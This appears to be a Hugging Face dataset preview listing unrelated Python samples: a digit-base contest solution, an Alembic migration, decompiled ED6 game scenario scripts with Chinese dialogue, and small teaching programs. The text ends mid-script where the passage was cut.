averoo/sc_Python · Datasets at Hugging Face

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import os import itertools class NumberBase: base_digits = '0123456789abcdefghijklmnopqrstuvwxyz' @staticmethod def get_minimum_non_repeating_number(base): min_number_digits = ['1', '0'] + [NumberBase.base_digits[x] for x in range(2, base)] min_number = int(''.join(min_number_digits), base) return min_number @staticmethod def get_maximum_non_repeating_number(base): max_number_digits = [NumberBase.base_digits[x] for x in range(base - 1, -1, -1)] max_number = int(''.join(max_number_digits), base) return max_number def main(): os.chdir(os.path.dirname(__file__)) input_file = open('submitInput.txt', 'r') input_file.readline() output_file = open('submitOutput.txt', 'w') for index, line in enumerate(input_file): base = len(line.rstrip()) min_number = NumberBase.get_minimum_non_repeating_number(base) max_number = NumberBase.get_maximum_non_repeating_number(base) output_file.write('Case #{}: {}\n'.format( index + 1, max_number - min_number )) input_file.close() output_file.close() if __name__ == '__main__': main()
"""empty message Revision ID: 76d81c37d676 Revises: 21d138d4483a Create Date: 2021-09-20 19:51:31.102664 """ from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import mysql # revision identifiers, used by Alembic. revision = '76d81c37d676' down_revision = '21d138d4483a' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column('trading', sa.Column('Bid outcome', sa.Float(), nullable=True)) op.drop_index('Date, time', table_name='trading') op.drop_column('trading', 'Bid outcome Volume') # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column('trading', sa.Column('Bid outcome Volume', mysql.FLOAT(), nullable=True)) op.create_index('Date, time', 'trading', ['Date, time'], unique=False) op.drop_column('trading', 'Bid outcome') # ### end Alembic commands ###
from ED6ScenarioHelper import * def main(): # 卢安 CreateScenaFile( FileName = 'T2104 ._SN', MapName = 'Ruan', Location = 'T2104.x', MapIndex = 1, MapDefaultBGM = "ed60010", Flags = 0, EntryFunctionIndex = 0xFFFF, Reserved = 0, IncludedScenario = [ '', '', '', '', '', '', '', '' ], ) BuildStringList( '@FileName', # 8 '戴尔蒙市长', # 9 '尤莉亚中尉', # 10 '亲卫队', # 11 '亲卫队', # 12 '亲卫队', # 13 '亲卫队', # 14 ' ', # 15 ) DeclEntryPoint( Unknown_00 = 0, Unknown_04 = 0, Unknown_08 = 6000, Unknown_0C = 4, Unknown_0E = 0, Unknown_10 = 0, Unknown_14 = 9500, Unknown_18 = -10000, Unknown_1C = 0, Unknown_20 = 0, Unknown_24 = 0, Unknown_28 = 2800, Unknown_2C = 262, Unknown_30 = 45, Unknown_32 = 0, Unknown_34 = 360, Unknown_36 = 0, Unknown_38 = 0, Unknown_3A = 0, InitScenaIndex = 0, InitFunctionIndex = 0, EntryScenaIndex = 0, EntryFunctionIndex = 1, ) AddCharChip( 'ED6_DT07/CH02410 ._CH', # 00 'ED6_DT07/CH02090 ._CH', # 01 'ED6_DT07/CH01320 ._CH', # 02 'ED6_DT07/CH00005 ._CH', # 03 'ED6_DT07/CH00015 ._CH', # 04 'ED6_DT07/CH00045 ._CH', # 05 ) AddCharChipPat( 'ED6_DT07/CH02410P._CP', # 00 'ED6_DT07/CH02090P._CP', # 01 'ED6_DT07/CH01320P._CP', # 02 'ED6_DT07/CH00005P._CP', # 03 'ED6_DT07/CH00015P._CP', # 04 'ED6_DT07/CH00045P._CP', # 05 ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 1, ChipIndex = 0x1, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0x180, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) ScpFunction( "Function_0_1BA", # 00, 0 "Function_1_1C9", # 01, 1 "Function_2_1E1", # 02, 2 ) def Function_0_1BA(): pass label("Function_0_1BA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 2)), scpexpr(EXPR_END)), "loc_1C8") OP_A3(0x3FA) Event(0, 2) label("loc_1C8") Return() # Function_0_1BA end def Function_1_1C9(): pass label("Function_1_1C9") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x65), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_72(0x3, 0x4) Event(0, 2) OP_22(0x1C4, 0x1, 0x64) Return() # Function_1_1C9 end def Function_2_1E1(): pass label("Function_2_1E1") OP_22(0x75, 0x0, 0x64) EventBegin(0x0) FadeToBright(2000, 0) OP_B0(0x2, 0xF) OP_6D(-15160, -2990, -35260, 0) OP_67(0, 4070, -10000, 0) OP_6B(1530, 0) OP_6C(0, 0) OP_6E(581, 0) OP_72(0x1, 0x2) OP_71(0x1, 0x40) OP_72(0x0, 0x2) OP_71(0x0, 0x40) OP_89(0x101, 59410, -2000, -3710, 270) OP_89(0x102, 61470, -2000, -4030, 270) OP_89(0x105, 60400, -2000, -3500, 270) def lambda_27F(): OP_6D(-14060, 2029, -15000, 6000) ExitThread() QueueWorkItem(0x101, 1, lambda_27F) def lambda_297(): OP_6C(314000, 11000) ExitThread() QueueWorkItem(0x101, 3, lambda_297) Sleep(3000) def lambda_2AC(): OP_6B(2620, 5000) ExitThread() QueueWorkItem(0x101, 0, lambda_2AC) def lambda_2BC(): OP_67(0, 8750, -10000, 5000) ExitThread() QueueWorkItem(0x101, 2, lambda_2BC) OP_6E(904, 8000) OP_44(0x101, 0xFF) Fade(1000) OP_6D(-6160, -2990, -12620, 0) OP_67(0, 4470, -10000, 0) OP_6B(2800, 0) OP_6C(314000, 0) OP_6E(388, 0) SetChrBattleFlags(0x8, 0x20) ClearChrFlags(0x8, 0x80) OP_89(0x8, 1090, -2890, -16110, 270) OP_0D() ChrTalk( 0x8, ( "#668F这、这飞艇是什么东西！\x02\x03", "是王国军的……\x01", "不对，这个徽章是……\x02", ) ) CloseMessageWindow() ClearChrFlags(0x9, 0x80) ClearChrFlags(0xA, 0x80) ClearChrFlags(0xB, 0x80) ClearChrFlags(0xC, 0x80) ClearChrFlags(0xD, 0x80) SetChrBattleFlags(0x9, 0x20) SetChrBattleFlags(0xA, 0x20) SetChrBattleFlags(0xB, 0x20) SetChrBattleFlags(0xC, 0x20) SetChrBattleFlags(0xD, 0x20) OP_89(0x9, -13380, 10050, -12580, 90) OP_89(0xA, -15510, 10050, -11720, 90) OP_89(0xB, -15520, 10050, -13390, 90) OP_89(0xC, -15520, 10050, -13390, 90) OP_89(0xD, -14360, 10050, -10980, 90) NpcTalk( 0x9, "女性的声音", ( "#4P……王室亲卫队所属。\x01", "高速巡洋舰『埃尔赛尤号』。\x02\x03", "这就是本舰的名字。\x02", ) ) CloseMessageWindow() def lambda_489(): OP_6D(-6340, -540, -14100, 3000) ExitThread() QueueWorkItem(0x101, 0, lambda_489) def lambda_4A1(): OP_67(0, 5660, -10000, 3000) ExitThread() QueueWorkItem(0x101, 1, lambda_4A1) def lambda_4B9(): OP_6B(2680, 3000) ExitThread() QueueWorkItem(0x101, 2, lambda_4B9) def lambda_4C9(): OP_6E(435, 3000) ExitThread() QueueWorkItem(0x101, 3, lambda_4C9) def lambda_4D9(): OP_6C(329000, 3000) ExitThread() QueueWorkItem(0x102, 0, lambda_4D9) Sleep(3000) NpcTalk( 0x9, "女性军官", ( "#170F咳咳……\x01", "看来总算是赶上了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#668F蓝白色军服……\x01", "难道是女王陛下的亲卫队！？\x02", ) ) CloseMessageWindow() NpcTalk( 0x9, "女性军官", ( "#176F正是如此。\x02\x03", "本人就是任职亲卫队中队长的\x01", "尤莉亚·舒华兹。\x02", ) ) CloseMessageWindow() Sleep(400) ChrTalk( 0x9, ( "#172F卢安市长，\x01", "莫里斯·戴尔蒙先生。\x02\x03", "你涉嫌纵火、抢劫、强占等多项罪行，\x01", "现在，我要将你拘捕归案。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#668F这是梦……\x01", "一定是梦……\x02\x03", "#664F啊……怎么搞的……\x02", ) ) CloseMessageWindow() Fade(500) ClearChrFlags(0x8, 0x80) SetChrFlags(0x8, 0x4) SetChrPos(0x8, 370, -2300, -16090, 180) OP_51(0x8, 0x2A, (scpexpr(EXPR_PUSH_LONG, 0x7530), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2B, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2C, (scpexpr(EXPR_PUSH_LONG, 0xFFFEA070), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2D, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2E, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2F, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_8C(0x8, 0, 300) OP_22(0x20C, 0x0, 0x64) OP_A1(0xE, 0x1) SetChrPos(0xE, 25470, -2990, -32360, 114) SetChrFlags(0xE, 0x40) SetChrFlags(0xE, 0x4) SetChrFlags(0x0, 0x20) SetChrFlags(0x1, 0x20) SetChrFlags(0x2, 0x20) SetChrChipByIndex(0x101, 3) SetChrChipByIndex(0x102, 4) SetChrChipByIndex(0x105, 5) def lambda_74F(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x2710, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_74F) Sleep(1700) OP_22(0xD4, 0x0, 0x64) def lambda_774(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x2328, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_774) Sleep(700) def lambda_794(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x1F40, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_794) Sleep(600) def lambda_7B4(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x1B58, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_7B4) def lambda_7CF(): OP_6D(-10020, 100, -16530, 3000) ExitThread() QueueWorkItem(0x101, 0, lambda_7CF) Sleep(400) def lambda_7EC(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x1770, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_7EC) Sleep(300) def lambda_80C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x1388, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_80C) Sleep(200) def lambda_82C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0xFA0, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_82C) Sleep(200) def lambda_84C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0xBB8, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_84C) Sleep(200) def lambda_86C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x7D0, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_86C) Sleep(200) def lambda_88C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x3E8, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_88C) WaitChrThread(0x101, 0x0) Fade(1000) SetChrChipByIndex(0x101, 65535) SetChrChipByIndex(0x102, 65535) SetChrChipByIndex(0x105, 65535) OP_0D() Sleep(500) OP_62(0x101, 0x0, 2000, 0x0, 0x1, 0xFA, 0x2) OP_22(0x26, 0x0, 0x64) OP_62(0x102, 0x0, 2000, 0x0, 0x1, 0xFA, 0x2) OP_22(0x26, 0x0, 0x64) Sleep(1000) ChrTalk( 0x101, ( "#004F这、这是……\x01", "到底是怎么回事啊？\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#014F我刚在想嘉恩先生请求支援的\x01", "王国军能不能及时赶到……\x02\x03", "即使是这样，\x01", "军队也似乎来得太快了吧……\x02", ) ) CloseMessageWindow() ChrTalk( 0x105, "#048F……呵呵………\x02", ) CloseMessageWindow() OP_8C(0x9, 135, 400) Sleep(400) ChrTalk( 0x9, ( "#171F啊，诸位游击士。\x02\x03", "很感谢诸位的帮忙。\x01", "接下来的事就请交给我们吧。\x02", ) ) CloseMessageWindow() FadeToDark(2000, 0, -1) OP_0D() OP_31(0x0, 0xFE, 0x0) OP_31(0x1, 0xFE, 0x0) OP_31(0x2, 0xFE, 0x0) OP_31(0x3, 0xFE, 0x0) OP_31(0x4, 0xFE, 0x0) OP_31(0x5, 0xFE, 0x0) OP_31(0x6, 0xFE, 0x0) OP_31(0x7, 0xFE, 0x0) ClearMapFlags(0x2000000) OP_A2(0x3FA) NewScene("ED6_DT01/T2102 ._SN", 100, 0, 0) IdleLoop() Return() # Function_2_1E1 end SaveToFile() Try(main)
# Exemplo de polimorfismo usando python # Autor ~ Dilson class Ponto: def __init__(self, x, y): self.x = x self.y = y def print_info (self): print ("Centro = (", self.x, ",", self.y, ")") class Circ(Ponto): #herança def __init__(self, x, y, r): Ponto.__init__(self, x, y) self.raio = r def print_info (self): Ponto.print_info (self) #herança print ("Raio = ", self.raio) print ("Ponto:") p1 = Ponto(2, 1) p1.print_info() print ("\nCirculo:") c1 = Circ (5, 4, 3) c1.print_info() print ("\n#Lista:\n") lista_diferentes = [p1, c1] print ("Primero:") lista_diferentes[0].print_info () # Polimorfismo - cada um responde de acordo com sua própria especificação # #é possível chamar o método correto! print ("\nSegundo:") # repare que o para o primeiro imprime somente o ponto lista_diferentes[1].print_info () # para o segundo imprime o ponto + raio
print("--Gestor de Promedios--") nota1 = int(input("Digite la primera nota: ")) nota2 = int(input("Digite la segunda nota: ")) nota3 = int(input("Digite la tercera nota: ")) promedio = (nota1 + nota2 + nota3)/3 if promedio >= 70: print("El promedio obtenido en base a las notas ingresadas es :",promedio) print("Aprobado") elif promedio < 70: print("El promedio obtenido en base a las notas ingresadas es :",promedio) print("Reprobado")
#coding:utf-8 from exception.exceptions import ProjectNotFoundError from dao.database import Database from dao.project.project import ProjectDao from dao.project.find import ProjectFindDao from dao.project.sql import ProjectSQL from model.project import Project """ """ class ProjectRepository(object): def __init__(self, db): self.__db = db def find_by_id(self, id_): sql = ProjectSQL() sql.where("id = ?") sql.order_by("name ASC") dao = ProjectFindDao(self.__db, sql.build(), [id_]) record = dao.get() if len(record) == 0: raise ProjectNotFoundError() return Project( record[0]["id"], record[0]["name"], record[0]["description"], record[0]["status"], record[0]["created"], record[0]["user_id"] ) def find_by_name(self, name): sql = ProjectSQL() sql.where("name = ?") sql.order_by("name ASC") dao = ProjectFindDao(self.__db, sql.build(), [name]) record = dao.get() if len(record) == 0: raise ProjectNotFoundError() return Project( record[0]["id"], record[0]["name"], record[0]["description"], record[0]["status"], record[0]["created"], record[0]["user_id"] ) def fetch_all(self): sql = ProjectSQL() sql.where("0 = 0") sql.order_by("name ASC") dao = ProjectFindDao(self.__db, sql.build(), []) record = dao.get() result = [] for item in record: _ = Project( item["id"], item["name"], item["description"], item["status"], item["created"], item["user_id"] ) result.append(_) return result def add_project(self, project, user): dao = ProjectDao(self.__db, project, user) self.__db.begin_trans() dao.create() self.__db.commit() def update_project(self, project, user): dao = ProjectDao(self.__db, project, user) self.__db.begin_trans() dao.update() self.__db.commit() def delete_project(self, project): dao = ProjectDao(self.__db, project, user) self.__db.begin_trans() dao.delete() self.__db.commit()
#首先生成随机数，并写人文本文件中; #接着打开文本文件，将里面的数字输出 #导入随机数生成的包 from random import randint def main(): #打开一个存放随机的文件 randtxt=open('yjy_file_txt_writeread_random_teach.txt','w') for i in range(20): randtxt.write(str(randint(0,9))+",") randtxt.close() #将存储在文本文件中的数字提取出来并显示 randtxtread=open('yjy_file_txt_writeread_random_teach.txt','r') s=randtxtread.read() #使用split函数将随机数字符串按照,分割，并返回一个列表 stringnumbers=s.split(',') #print(stringnumber) for number in stringnumbers: print (number ,end=" ") randtxtread.close() main()
from ED6ScenarioHelper import * def main(): # 蔡斯飞艇坪 CreateScenaFile( FileName = 'T3101 ._SN', MapName = 'Zeiss', Location = 'T3101.x', MapIndex = 1, MapDefaultBGM = "ed60013", Flags = 0, EntryFunctionIndex = 0xFFFF, Reserved = 0, IncludedScenario = [ '', '', '', '', '', '', '', '' ], ) BuildStringList( '@FileName', # 8 '朵洛希', # 9 '玛多克工房长', # 10 '特莱斯主任', # 11 '海泽尔', # 12 '索黛丽娅', # 13 '阿利瑟', # 14 '米优', # 15 '斯坦因', # 16 '温丝', # 17 '埃尔文', # 18 '王', # 19 '莱恩', # 20 '科奇莫爷爷', # 21 '莫妮卡', # 22 '布鲁诺', # 23 '伊格尔', # 24 '普利亚姆', # 25 '爱玲', # 26 '雷曼', # 27 '鲁迪', # 28 '菲', # 29 '埃里克', # 30 '康丝坦茨', # 31 '雨果', # 32 '安东尼', # 33 '普罗梅笛', # 34 '雷伊', # 35 '蒂亚利', # 36 '米妮亚姆', # 37 '威尔姆', # 38 '格斯塔夫维修长', # 39 ' ', # 40 '蔡斯飞艇坪', # 41 '蔡斯市·市街区', # 42 ) DeclEntryPoint( Unknown_00 = 0, Unknown_04 = 0, Unknown_08 = 6000, Unknown_0C = 4, Unknown_0E = 0, Unknown_10 = 0, Unknown_14 = 9500, Unknown_18 = -10000, Unknown_1C = 0, Unknown_20 = 0, Unknown_24 = 0, Unknown_28 = 2800, Unknown_2C = 262, Unknown_30 = 45, Unknown_32 = 0, Unknown_34 = 360, Unknown_36 = 0, Unknown_38 = 0, Unknown_3A = 0, InitScenaIndex = 0, InitFunctionIndex = 0, EntryScenaIndex = 0, EntryFunctionIndex = 1, ) AddCharChip( 'ED6_DT07/CH02070 ._CH', # 00 'ED6_DT07/CH02620 ._CH', # 01 'ED6_DT07/CH01190 ._CH', # 02 'ED6_DT07/CH01540 ._CH', # 03 'ED6_DT07/CH01030 ._CH', # 04 'ED6_DT07/CH01130 ._CH', # 05 'ED6_DT07/CH01050 ._CH', # 06 'ED6_DT07/CH01200 ._CH', # 07 'ED6_DT07/CH01470 ._CH', # 08 'ED6_DT07/CH01040 ._CH', # 09 'ED6_DT07/CH01760 ._CH', # 0A 'ED6_DT07/CH01450 ._CH', # 0B 'ED6_DT07/CH01100 ._CH', # 0C 'ED6_DT07/CH02490 ._CH', # 0D 'ED6_DT07/CH01530 ._CH', # 0E 'ED6_DT07/CH01250 ._CH', # 0F 'ED6_DT07/CH01140 ._CH', # 10 'ED6_DT07/CH01150 ._CH', # 11 'ED6_DT07/CH01450 ._CH', # 12 'ED6_DT07/CH01500 ._CH', # 13 'ED6_DT07/CH01550 ._CH', # 14 'ED6_DT07/CH01450 ._CH', # 15 'ED6_DT07/CH01230 ._CH', # 16 'ED6_DT07/CH01680 ._CH', # 17 'ED6_DT07/CH01700 ._CH', # 18 'ED6_DT07/CH01100 ._CH', # 19 'ED6_DT07/CH01220 ._CH', # 1A 'ED6_DT07/CH01660 ._CH', # 1B 'ED6_DT07/CH01430 ._CH', # 1C 'ED6_DT07/CH01450 ._CH', # 1D 'ED6_DT07/CH02440 ._CH', # 1E ) AddCharChipPat( 'ED6_DT07/CH02070P._CP', # 00 'ED6_DT07/CH02620P._CP', # 01 'ED6_DT07/CH01190P._CP', # 02 'ED6_DT07/CH01540P._CP', # 03 'ED6_DT07/CH01030P._CP', # 04 'ED6_DT07/CH01130P._CP', # 05 'ED6_DT07/CH01050P._CP', # 06 'ED6_DT07/CH01200P._CP', # 07 'ED6_DT07/CH01470P._CP', # 08 'ED6_DT07/CH01040P._CP', # 09 'ED6_DT07/CH01760P._CP', # 0A 'ED6_DT07/CH01450P._CP', # 0B 'ED6_DT07/CH01100P._CP', # 0C 'ED6_DT07/CH02490P._CP', # 0D 'ED6_DT07/CH01530P._CP', # 0E 'ED6_DT07/CH01250P._CP', # 0F 'ED6_DT07/CH01140P._CP', # 10 'ED6_DT07/CH01150P._CP', # 11 'ED6_DT07/CH01450P._CP', # 12 'ED6_DT07/CH01500P._CP', # 13 'ED6_DT07/CH01550P._CP', # 14 'ED6_DT07/CH01450P._CP', # 15 'ED6_DT07/CH01230P._CP', # 16 'ED6_DT07/CH01680P._CP', # 17 'ED6_DT07/CH01700P._CP', # 18 'ED6_DT07/CH01100P._CP', # 19 'ED6_DT07/CH01220P._CP', # 1A 'ED6_DT07/CH01660P._CP', # 1B 'ED6_DT07/CH01430P._CP', # 1C 'ED6_DT07/CH01450P._CP', # 1D 'ED6_DT07/CH02440P._CP', # 1E ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 24, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 1, ChipIndex = 0x1, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 23, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 14, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 3, ChipIndex = 0x3, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 26, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 4, ChipIndex = 0x4, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 36, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 5, ChipIndex = 0x5, NpcIndex = 0x101, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 37, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 6, ChipIndex = 0x6, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 38, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 7, ChipIndex = 0x7, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 39, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 8, ChipIndex = 0x8, NpcIndex = 0x101, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 40, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 9, ChipIndex = 0x9, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 41, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 10, ChipIndex = 0xA, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 42, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 11, ChipIndex = 0xB, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 32, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 12, ChipIndex = 0xC, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 33, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 13, ChipIndex = 0xD, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 34, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 14, ChipIndex = 0xE, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 35, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 15, ChipIndex = 0xF, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 19, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 16, ChipIndex = 0x10, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 30, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 17, ChipIndex = 0x11, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 31, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 18, ChipIndex = 0x12, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 29, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 19, ChipIndex = 0x13, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 28, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 20, ChipIndex = 0x14, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 27, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 21, ChipIndex = 0x15, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 25, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 22, ChipIndex = 0x16, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 22, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 23, ChipIndex = 0x17, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 20, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 24, ChipIndex = 0x18, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 21, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 25, ChipIndex = 0x19, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 18, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 26, ChipIndex = 0x1A, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 17, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 27, ChipIndex = 0x1B, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 16, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 28, ChipIndex = 0x1C, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 15, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, 